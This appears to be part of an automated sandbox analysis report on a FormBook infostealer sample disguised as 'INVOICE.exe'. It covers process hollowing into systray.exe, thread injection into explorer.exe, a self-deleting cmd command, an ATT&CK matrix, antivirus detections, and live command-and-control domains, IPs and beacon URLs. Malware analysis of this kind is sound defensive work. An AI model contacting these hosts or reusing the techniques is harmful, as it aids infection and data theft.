          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04884496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04898CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0489740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0489740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0489740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04881C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0485C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0485C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04882D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04882D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04882D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04882D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04882D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04882D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04882D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04846DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0488FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0488FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0488FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0488FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.29.70 80
          Source: C:\Windows\explorer.exeDomain query: www.cpf3life.com
          Source: C:\Windows\explorer.exeDomain query: www.phonetomouth.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.dollysusmitha.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\INVOICE.exeSection loaded: unknown target: C:\Users\user\Desktop\INVOICE.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INVOICE.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INVOICE.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INVOICE.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INVOICE.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\INVOICE.exeThread register set: target process: 3388
          Source: C:\Users\user\Desktop\INVOICE.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\INVOICE.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\INVOICE.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: C50000
          Source: C:\Users\user\Desktop\INVOICE.exeProcess created: C:\Users\user\Desktop\INVOICE.exe 'C:\Users\user\Desktop\INVOICE.exe'
          Source: C:\Users\user\Desktop\INVOICE.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INVOICE.exe'
          Source: explorer.exe, 00000003.00000000.205565611.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000000.229535817.0000000001980000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.462742545.0000000002FF0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.214706291.0000000006860000.00000004.00000001.sdmp, systray.exe, 00000008.00000002.462742545.0000000002FF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.229535817.0000000001980000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.462742545.0000000002FF0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.229535817.0000000001980000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.462742545.0000000002FF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery131Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433143 Sample: INVOICE.exe Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 29 www.gicc-fx.com 2->29 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 7 other signatures 2->51 10 INVOICE.exe 20 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\Local\...\System.dll, PE32 10->27 dropped 53 Detected unpacking (changes PE section rights) 10->53 55 Maps a DLL or memory area into another process 10->55 57 Tries to detect virtualization through RDTSC time measurements 10->57 14 INVOICE.exe 10->14         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 14->59 61 Maps a DLL or memory area into another process 14->61 63 Sample uses process hollowing technique 14->63 65 Queues an APC in another process (thread injection) 14->65 17 systray.exe 14->17         started        20 explorer.exe 14->20 injected process9 dnsIp10 37 Modifies the context of a thread in another process (thread injection) 17->37 39 Maps a DLL or memory area into another process 17->39 41 Tries to detect virtualization through RDTSC time measurements 17->41 23 cmd.exe 1 17->23         started        31 www.cpf3life.com 104.21.29.70, 49747, 80 CLOUDFLARENETUS United States 20->31 33 www.phonetomouth.com 20->33 35 2 other IPs or domains 20->35 43 System process connects to network (likely due to code injection or exploit) 20->43 signatures11 process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          INVOICE.exe66%ReversingLabsWin32.Trojan.Emotet
          INVOICE.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsj9221.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsj9221.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.INVOICE.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          0.2.INVOICE.exe.9990000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.INVOICE.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.INVOICE.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.2.systray.exe.4ccf834.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.INVOICE.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          0.0.INVOICE.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          8.2.systray.exe.ac3748.0.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.cpf3life.com/uer0/?cT=IWphFoHV4jp5oknFMScIxRoUR2WJRPQs/XYBCw5pT/o6GbblNl6C3qYdj4q6OTOtoDPc&0rjL0=00GhNj0PalVPThz0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.phonetomouth.com/uer0/?0rjL0=00GhNj0PalVPThz&cT=mzn46ufhhzCxwm8qeMWDu5BECFFcgbpMb+xr4Y5+z9rgY/t3xuFClMCjGCpTywHehpEI0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          www.gicc-fx.com/uer0/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.cpf3life.com
          		104.21.29.70
          		truetrue
            		unknown
            www.gicc-fx.com
            		198.252.100.204
            		truetrue
              		unknown
              phonetomouth.com
              		34.102.136.180
              		truefalse
                		unknown
                www.phonetomouth.com
                		unknown
                		unknowntrue
                  		unknown
                  www.dollysusmitha.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.cpf3life.com/uer0/?cT=IWphFoHV4jp5oknFMScIxRoUR2WJRPQs/XYBCw5pT/o6GbblNl6C3qYdj4q6OTOtoDPc&0rjL0=00GhNj0PalVPThztrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.phonetomouth.com/uer0/?0rjL0=00GhNj0PalVPThz&cT=mzn46ufhhzCxwm8qeMWDu5BECFFcgbpMb+xr4Y5+z9rgY/t3xuFClMCjGCpTywHehpEIfalse
                    • Avira URL Cloud: safe
                    		unknown
                    www.gicc-fx.com/uer0/true
                    • Avira URL Cloud: safe
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.comexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                              		high
                              http://www.tiro.comexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://nsis.sf.net/NSIS_ErrorErrorINVOICE.exefalse
                                  		high
                                  http://www.goodfont.co.krexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comlexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
